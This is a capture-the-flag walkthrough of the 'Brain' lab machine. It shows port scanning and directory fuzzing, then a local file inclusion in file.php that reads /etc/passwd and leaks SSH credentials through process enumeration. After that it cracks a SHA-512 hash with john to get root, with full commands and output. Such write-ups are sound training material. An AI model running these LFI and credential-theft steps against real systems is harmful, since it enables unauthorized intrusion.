Brain
This machine was created by d4t4s3c
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon brain.hmvm
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-20 10:50 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:50
Completed NSE at 10:50, 0.00s elapsed
Initiating ARP Ping Scan at 10:50
Scanning 10.0.2.24 [1 port]
Completed ARP Ping Scan at 10:50, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:50
Scanning brain.hmvm (10.0.2.24) [65535 ports]
Discovered open port 22/tcp on 10.0.2.24
Discovered open port 80/tcp on 10.0.2.24
Completed SYN Stealth Scan at 10:50, 1.48s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.24.
Initiating NSE at 10:50
Completed NSE at 10:50, 0.00s elapsed
Nmap scan report for brain.hmvm (10.0.2.24)
Host is up (0.000062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:33:41:58 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 10:50
Completed NSE at 10:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.72 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[i] [Server info]
http://10.0.2.24:80 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.24], Title[Apache2 Debian Default Page: It works]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Sep 20 10:50:10 2022
URL_BASE: http://10.0.2.24:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.24:80/ ----
+ http://10.0.2.24:80/index.html (CODE:200|SIZE:10701)
+ http://10.0.2.24:80/robots.txt (CODE:200|SIZE:162)
+ http://10.0.2.24:80/server-status (CODE:403|SIZE:274)
-----------------
END_TIME: Tue Sep 20 10:50:11 2022
DOWNLOADED: 4612 - FOUND: 3
recon reports two open ports 22 for ssh and 80 for http
┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://brain.hmvm/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://brain.hmvm/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000007: 200 368 L 933 W 10701 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000014: 200 368 L 933 W 10701 Ch "http://brain.hmvm/"
000000013: 200 368 L 933 W 10701 Ch "#"
000000012: 200 368 L 933 W 10701 Ch "# on atleast 2 different hosts"
000000011: 200 368 L 933 W 10701 Ch "# Priority ordered case sensative list, where entries were found"
000000010: 200 368 L 933 W 10701 Ch "#"
000000006: 200 368 L 933 W 10701 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000008: 200 368 L 933 W 10701 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000002: 200 368 L 933 W 10701 Ch "#"
000000005: 200 368 L 933 W 10701 Ch "# This work is licensed under the Creative Commons"
000000004: 200 368 L 933 W 10701 Ch "#"
000000009: 200 368 L 933 W 10701 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000001: 200 368 L 933 W 10701 Ch "# directory-list-2.3-medium.txt"
000000003: 200 368 L 933 W 10701 Ch "# Copyright 2007 James Fisher"
000014961: 301 9 L 28 W 313 Ch "brainstorm"
000045240: 200 368 L 933 W 10701 Ch "http://brain.hmvm/"
000095524: 403 9 L 28 W 275 Ch "server-status"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 0
Found brainstorm dir
┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://brain.hmvm/brainstorm/FUZZ.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://brain.hmvm/brainstorm/FUZZ.php
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 4 L 7 W 80 Ch "# directory-list-2.3-medium.txt"
000000003: 200 4 L 7 W 80 Ch "# Copyright 2007 James Fisher"
000000007: 200 4 L 7 W 80 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000011: 200 4 L 7 W 80 Ch "# Priority ordered case sensative list, where entries were found"
000000014: 403 9 L 28 W 275 Ch "http://brain.hmvm/brainstorm/.php"
000000012: 200 4 L 7 W 80 Ch "# on atleast 2 different hosts"
000000013: 200 4 L 7 W 80 Ch "#"
000000006: 200 4 L 7 W 80 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000010: 200 4 L 7 W 80 Ch "#"
000000008: 200 4 L 7 W 80 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000009: 200 4 L 7 W 80 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000005: 200 4 L 7 W 80 Ch "# This work is licensed under the Creative Commons"
000000002: 200 4 L 7 W 80 Ch "#"
000000004: 200 4 L 7 W 80 Ch "#"
000000759: 200 0 L 0 W 0 Ch "file"
000045240: 403 9 L 28 W 275 Ch "http://brain.hmvm/brainstorm/.php"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220544
Requests/sec.: 0
Found /brainstorm/file.php file
┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hh=0 --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 'http://brain.hmvm/brainstorm/file.php?FUZZ=/etc/passwd'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://brain.hmvm/brainstorm/file.php?FUZZ=/etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000759: 200 26 L 38 W 1401 Ch "file"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220559
Requests/sec.: 0
Using wfuzz to found an LFI
┌──(root@ghost)-[/home/ghost]
└─# curl 'http://brain.hmvm/brainstorm/file.php?file=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
salomon:x:1000:1000:salomon,,,:/home/salomon:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
Here the LFI
┌──(root@ghost)-[/home/ghost]
└─# lfienum "http://brain.hmvm/brainstorm/file.php?file=" --pid
lfiǝnum ~by 0bfxgh0st*
Bruteforcing 0-999 PIDS (please ignore junk data)
PID 1: /sbin/init
PID 218: /lib/systemd/systemd-journald
PID 238: /lib/systemd/systemd-udevd
PID 260: /lib/systemd/systemd-timesyncd
PID 296: /lib/systemd/systemd-timesyncd
PID 317: /usr/bin/dbus-daemon--system--address=systemd:--nofork--nopidfile--systemd-activation--syslog-only
PID 326: /usr/sbin/rsyslogd-n-iNONE
PID 329: /lib/systemd/systemd-logind
PID 331: /usr/sbin/cron-f
PID 340: /usr/sbin/CRON-f
PID 342: /usr/sbin/rsyslogd-n-iNONE
PID 343: /usr/sbin/rsyslogd-n-iNONE
PID 346: /sbin/dhclient-4-v-i-pf/run/dhclient.enp0s3.pid-lf/var/lib/dhcp/dhclient.enp0s3.leases-I-df/var/lib/dhcp/dhclient6.enp0s3.leasesenp0s3
PID 348: /usr/sbin/rsyslogd-n-iNONE
PID 365: /bin/sh-c/root/.debug/salomon:MyBr4iN
PID 371: /bin/bash/root/.debug/salomon:MyBr4iN
PID 385: /sbin/agetty-o-p -- \u--nocleartty1linux
PID 388: python/root/server.py127.0.0.1:65000
PID 389: sleep999999999999999
PID 398: /usr/sbin/sshd-D
PID 426: /usr/sbin/apache2-kstart
PID 708: /usr/sbin/apache2-kstart
PID 784: /usr/sbin/apache2-kstart
PID 788: /usr/sbin/apache2-kstart
After enumerating process with lfienum we found salomon:MyBr4iN and python/root/server.py 127.0.0.1:65000 (keep this local server in mind to elevate to root later)
┌──(root@ghost)-[/home/ghost]
└─# ssh salomon@brain.hmvm
The authenticity of host 'brain.hmvm (10.0.2.24)' can't be established.
ED25519 key fingerprint is SHA256:fkqq58u/sGpESMAWndC860Dp3sVGoKVkrQdlahLQV5A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'brain.hmvm' (ED25519) to the list of known hosts.
salomon@brain.hmvm's password:
Linux Brain 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
BBBBBBBBBBBBBBBBB RRRRRRRRRRRRRRRRR AAA IIIIIIIIII NNNNNNNN NNNNNNNN
B::::::::::::::::B R::::::::::::::::R A:::A I::::::::I N:::::::N N::::::N
B::::::BBBBBB:::::B R::::::RRRRRR:::::R A:::::A I::::::::I N::::::::N N::::::N
BB:::::B B:::::B RR:::::R R:::::R A:::::::A II::::::II N:::::::::N N::::::N
B::::B B:::::B R::::R R:::::R A:::::::::A I::::I N::::::::::N N::::::N
B::::B B:::::B R::::R R:::::R A:::::A:::::A I::::I N:::::::::::N N::::::N
B::::BBBBBB:::::B R::::RRRRRR:::::R A:::::A A:::::A I::::I N:::::::N::::N N::::::N
B:::::::::::::BB R:::::::::::::RR A:::::A A:::::A I::::I N::::::N N::::N N::::::N
B::::BBBBBB:::::B R::::RRRRRR:::::R A:::::A A:::::A I::::I N::::::N N::::N:::::::N
B::::B B:::::B R::::R R:::::R A:::::AAAAAAAAA:::::A I::::I N::::::N N:::::::::::N
B::::B B:::::B R::::R R:::::R A:::::::::::::::::::::A I::::I N::::::N N::::::::::N
B::::B B:::::B R::::R R:::::R A:::::AAAAAAAAAAAAA:::::A I::::I N::::::N N:::::::::N
BB:::::BBBBBB::::::B RR:::::R R:::::R A:::::A A:::::A II::::::II N::::::N N::::::::N
B:::::::::::::::::B R::::::R R:::::R A:::::A A:::::A I::::::::I N::::::N N:::::::N
B::::::::::::::::B R::::::R R:::::R A:::::A A:::::A I::::::::I N::::::N N::::::N
BBBBBBBBBBBBBBBBB RRRRRRRR RRRRRRR AAAAAAA AAAAAAA IIIIIIIIII NNNNNNNN NNNNNNN
salomon@Brain:~$ cat user.txt
onSs045i6lJ3vDtARf4k3f1467wZu3I8HKY8syrhQ
We are in the machine as salomon from ssh. Time to elevate us to root
salomon@Brain:~$ ss -tunl
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:65000 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
salomon@Brain:~$ nc 127.0.0.1 65000
GET / HTTP/1.0
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.16
Date: Tue, 20 Sep 2022 15:34:05 GMT
Content-type: text/html
Content-Length: 192
Last-Modified: Tue, 26 Jan 2021 11:20:06 GMT
[+] You are a great Hacker!! I think you are looking for this:
065BB0B9A0C654E5B3B6292C4698BD67CE6A331209D941989EC4D728FBE3290E47D2058839215BBE6144F51E7FCE8A8C6A5626E0CB7521641D742251F5A17167
┌──(root@ghost)-[/home/ghost]
└─# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 065BB0B9A0C654E5B3B6292C4698BD67CE6A331209D941989EC4D728FBE3290E47D2058839215BBE6144F51E7FCE8A8C6A5626E0CB7521641D742251F5A17167
Possible Hashs:
[+] SHA-512
[+] Whirlpool
Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------
┌──(root@ghost)-[/home/ghost]
└─# john --format=RAW-SHA512 --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Press 'q' or Ctrl-C to abort, almost any other key for status
gemini (?)
1g 0:00:00:00 DONE (2022-09-20 11:38) 33.33g/s 8533p/s 8533c/s 8533C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
salomon@Brain:~$ su root
Contraseña:
root@Brain:/home/salomon# cat /root/root.txt
gmC9G4598djf4k3f146UqxXj8zCx3baoUWM39sdk